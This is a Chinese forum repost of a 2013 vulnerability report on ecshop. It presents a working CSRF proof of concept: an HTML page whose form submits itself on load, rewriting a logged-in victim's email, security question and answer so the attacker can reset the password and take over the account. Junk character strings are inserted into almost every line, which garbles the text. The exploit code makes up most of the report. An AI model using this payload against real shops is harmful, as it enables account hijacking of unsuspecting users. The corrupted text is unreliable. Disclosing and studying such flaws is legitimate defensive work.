找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2053|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:2 l3 Q" }5 \7 b
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现2 ?% R. W1 \8 N

) W( U9 I& x0 I- L3 g7 VDemo For:http://www.wooyun.org/bug.php?action=view&id=395
! r4 G& x& t; P6 C9 _5 F. @; ^- R& F7 _. p9 q" @8 j
详细说明:8 T; H- U, `* j8 C) j  v' X
利用csrf和xss可以突破官方所说的“障碍”: X# H6 z+ Y$ w2 x: v0 Q8 \" U
xss版本已经有人说明! {1 D/ z' A. A* ]: T
这里给出csrf版本7 {' i1 ~, c$ v$ y  Y; c
5 a  L& V7 F4 S; `% R0 Q4 W' [
漏洞证明:
* ]. K  Y, G7 Y) a<html>
; d* f0 r3 b4 _, }; Z<body>
& ^& @' x% j9 {; A. v: f, ~<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* N6 C" p& T; A! {<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">! Q5 K% u4 P0 S
<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 r) L. K' \! ~4 v3 L9 [4 k
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
+ D$ C$ |/ ~% q' K' B5 P# G/ `<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
4 x6 B; W4 R+ I$ Y</body>
3 r- q6 a2 u! W7 x6 @<script>6 V' ?! h7 o' r: W. Y
document.forms[0].submit();$ L, w7 I& I- l4 I1 ^0 D
</script>
( D  _2 ]6 P6 F% F</html>% Q' h. E9 F" Z; |. v9 u% J
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
" v1 x5 K1 D2 \9 ~; r% n$ }) ?- w6 G1 e: u- t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表